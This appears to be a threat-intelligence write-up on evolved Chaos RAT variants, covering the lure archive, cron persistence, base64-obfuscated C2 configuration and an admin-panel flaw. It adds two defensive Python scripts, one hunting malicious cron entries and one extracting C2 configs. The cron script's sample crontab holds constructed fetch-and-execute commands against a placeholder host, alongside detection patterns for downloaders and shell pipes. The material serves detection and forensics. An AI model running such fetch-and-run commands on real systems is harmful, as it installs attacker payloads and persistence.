Acronis Threat Research Unit (TRU) has uncovered newly evolved variants of Chaos RAT, a once-legitimate open-source remote administration tool that is now actively leveraged in malicious campaigns targeting Linux and Windows systems.
First observed in 2022 and initially built as a cross-platform management utility, it has increasingly drawn the interest of cybercriminals due to its flexibility, low detection footprint, and open-source accessibility.
Originally designed and distributed on GitHub as a remote management tool written in Golang, Chaos RAT has been weaponized by threat actors who are using it in stealthy, real-world attacks.
The latest samples, discovered in 2025, demonstrate the tool’s ongoing evolution, with expanded compatibility, obfuscation techniques, and operational stealth. While its usage remains relatively limited compared to other malware families, its ability to bypass detection and maintain persistent access has made it a tool of choice for espionage, data exfiltration, and post-exploitation operations, including ransomware deployment.
Researchers have also identified a critical vulnerability in Chaos RAT’s web-based administration panel that could allow remote code execution on the server hosting the panel. The flaw does not directly affect victim machines, but it exposes the insecure design practices behind the tool and, more importantly, could let one attacker seize control of another operator’s infrastructure. The case highlights the broader risks of open-source tooling circulating within cybercrime supply chains.

In the latest sample, spotted on VirusTotal and submitted from India, a tar.gz archive named NetworkAnalyzer.tar.gz contained the final Chaos RAT payload.
How the victim received the archive is not documented, but the available information points to a lure designed to convince them to download a network troubleshooting utility for Linux environments.
Chaos RAT typically reaches victims through phishing emails or compromised websites. Earlier campaigns deployed malicious scripts that modified cron configuration, a common persistence mechanism on Unix-like systems: by installing a cron job that fetches payloads from a remote server, attackers can update the malware without re-infecting the host.
Earlier attacks used this same approach to deliver cryptocurrency miners alongside the RAT, which suggests that the RAT’s primary role was reconnaissance or establishing a foothold.
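The cron-based persistence described above is something a responder can hunt for directly on a suspect host. The following is an added example, not code from the Acronis report or from Chaos RAT: the crontab lines are constructed for illustration, the 203.0.113.10 address is a documentation address, and the fetch/run patterns flagged are this example's own heuristics rather than indicators taken from the report.

```python
"""Hunt for cron entries that fetch and execute remote payloads.

Added example, not code from the Acronis report or from Chaos RAT. The
crontab content, the 203.0.113.10 address and the heuristics below are
constructed for illustration, not indicators from the report.
"""
import re

# Constructed sample of an /etc/crontab (not real telemetry).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/10 *  * * *   root    curl -fsSL http://203.0.113.10/update.sh | sh
@reboot          root    wget -q -O /tmp/.na http://203.0.113.10/na && chmod +x /tmp/.na && /tmp/.na
0 3     * * *   backup  /usr/local/bin/backup.sh --quiet
"""

# Heuristics (assumptions): downloaders, ways of executing what they fetched,
# remote URLs, and world-writable staging directories commonly used for drops.
FETCHERS = re.compile(r"\b(curl|wget|fetch|python\d?\s+-c|base64\s+-d)\b")
RUNNERS = re.compile(r"(\|\s*(ba|z|da)?sh\b|&&\s*/tmp/|chmod\s+\+x|\beval\b|\bexec\b)")
URL = re.compile(r"https?://[^\s'\"]+")
STAGING = re.compile(r"/(tmp|dev/shm|var/tmp)/")


def parse_crontab(text, system_crontab=True):
    """Yield (schedule, user, command); skips comments and VAR=value lines.

    system_crontab=True is the /etc/crontab layout with a user column;
    per-user crontabs (crontab -l) have no user column.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        n_sched = 1 if line.startswith("@") else 5   # @reboot vs. five time fields
        n_user = 1 if system_crontab else 0
        parts = line.split(None, n_sched + n_user)
        if len(parts) < n_sched + n_user + 1:
            continue  # malformed line; nothing to run
        schedule = " ".join(parts[:n_sched])
        user = parts[n_sched] if system_crontab else None
        command = parts[n_sched + n_user]
        yield schedule, user, command


def score_command(command):
    """Return the reasons a cron command looks like remote-payload persistence."""
    reasons = []
    has_fetch = FETCHERS.search(command) is not None
    if has_fetch and URL.search(command):
        reasons.append("downloads from a remote URL")
    if has_fetch and RUNNERS.search(command):
        reasons.append("pipes or hands downloaded content to an interpreter")
    if STAGING.search(command):
        reasons.append("stages files in a world-writable directory")
    return reasons


def find_suspicious_cron_entries(text, system_crontab=True):
    """Return [(schedule, user, command, reasons)] for entries worth triage."""
    hits = []
    for schedule, user, command in parse_crontab(text, system_crontab):
        reasons = score_command(command)
        if reasons:
            hits.append((schedule, user, command, reasons))
    return hits


if __name__ == "__main__":
    for schedule, user, command, reasons in find_suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"[{schedule}] {user}: {command}\n    -> {'; '.join(reasons)}")
```

On a live host the same function can be fed the contents of /etc/crontab, the files under /etc/cron.d, and each user's crontab (parsed with system_crontab=False); the two constructed entries that fetch from 203.0.113.10 are flagged, the distribution's run-parts entries are not.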
Notably, older Chaos RAT versions stored configuration data such as C2 IP addresses and ports in plain text, whereas the newer variant wraps the entire configuration in a single base64-encoded string paired with an additional decoding function, a clear attempt to hinder reverse engineering and forensic analysis.
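Recovering that configuration from a sample is exactly the forensic task the encoding is meant to slow down. The following is an added example, not code from Chaos RAT or from the Acronis report: the page does not describe the real configuration layout, so the example assumes a hypothetical `key=value|key=value` string wrapped in one base64 blob, and both "binaries" it scans are constructed in the code. It covers both styles the paragraph contrasts: a clear-text host:port (old variant) and a base64-encapsulated config (new variant).

```python
"""Recover a C2 configuration from a binary: clear-text host:port, or a
base64-wrapped config string.

Added example, not Chaos RAT's code. The config layout
("host=...|port=...|token=...", base64-encoded) is an assumption made for
illustration; the sample binaries below are constructed, and 198.51.100.7
is a documentation address.
"""
import base64
import binascii
import re

# A run of at least 24 base64-alphabet characters with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")
# Clear-text host:port as older variants stored it.
HOST_PORT = re.compile(r"(?P<host>[\w.\-]+):(?P<port>\d{1,5})")

# Constructed filler: an ELF magic, every byte value once (which contains
# A-Z and a-z runs that look like base64 but are not), and a source path.
FILLER = b"\x7fELF" + bytes(range(256)) + b"\x00/tmp/go-build/main.go\x00"


def build_base64_config(pairs):
    """Encode the assumed 'k=v|k=v' layout the way a new-style sample would."""
    plain = "|".join(f"{k}={v}" for k, v in pairs.items()).encode()
    return base64.b64encode(plain)


# Old style: config in the clear.  New style: one base64 blob.
OLD_SAMPLE = FILLER + b"\x00198.51.100.7:4444\x00" + FILLER
NEW_SAMPLE = (FILLER + b"\x00"
              + build_base64_config({"host": "198.51.100.7", "port": "8443",
                                     "token": "demo-token"})
              + b"\x00" * 8 + FILLER)


def looks_like_text(data):
    """True if the bytes are overwhelmingly printable ASCII (config, not noise)."""
    if not data:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable / len(data) > 0.95


def decode_candidates(blob):
    """Yield (offset, text) for base64 runs that decode to printable text."""
    for m in B64_RUN.finditer(blob):
        cand = m.group(0)
        # Drop trailing characters that cannot form a whole base64 quantum
        # (e.g. the 26-char 'A'..'Z' run in FILLER).
        cand = cand[: len(cand) - len(cand) % 4]
        try:
            decoded = base64.b64decode(cand, validate=True)
        except (binascii.Error, ValueError):
            continue
        if looks_like_text(decoded):
            yield m.start(), decoded.decode("latin-1")


def extract_config(text):
    """Parse the assumed layout into a dict; None unless it carries host and port."""
    fields = {}
    for part in text.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    if "host" in fields and fields.get("port", "").isdigit():
        return fields
    return None


def find_c2_config(blob):
    """Return findings from both storage styles for one binary blob."""
    findings = []
    for m in HOST_PORT.finditer(blob.decode("latin-1")):
        port = int(m.group("port"))
        if 0 < port < 65536:
            findings.append({"kind": "plaintext", "host": m.group("host"), "port": port})
    for offset, text in decode_candidates(blob):
        cfg = extract_config(text)
        if cfg:
            findings.append({"kind": "base64", "offset": offset, "host": cfg["host"],
                             "port": int(cfg["port"]), "fields": cfg})
    return findings


if __name__ == "__main__":
    for name, sample in (("old-style", OLD_SAMPLE), ("new-style", NEW_SAMPLE)):
        print(name, find_c2_config(sample))
```

The plain `strings`-style search finds the C2 endpoint in the old-style sample and nothing in the new one; only the base64 pass surfaces it there, which is the whole effect of the change the paragraph describes. Real samples will need the decoder adjusted to whatever layout the binary's decoding routine actually expects, and candidates that are immediately followed by other base64-alphabet bytes will be merged into one run by the regex.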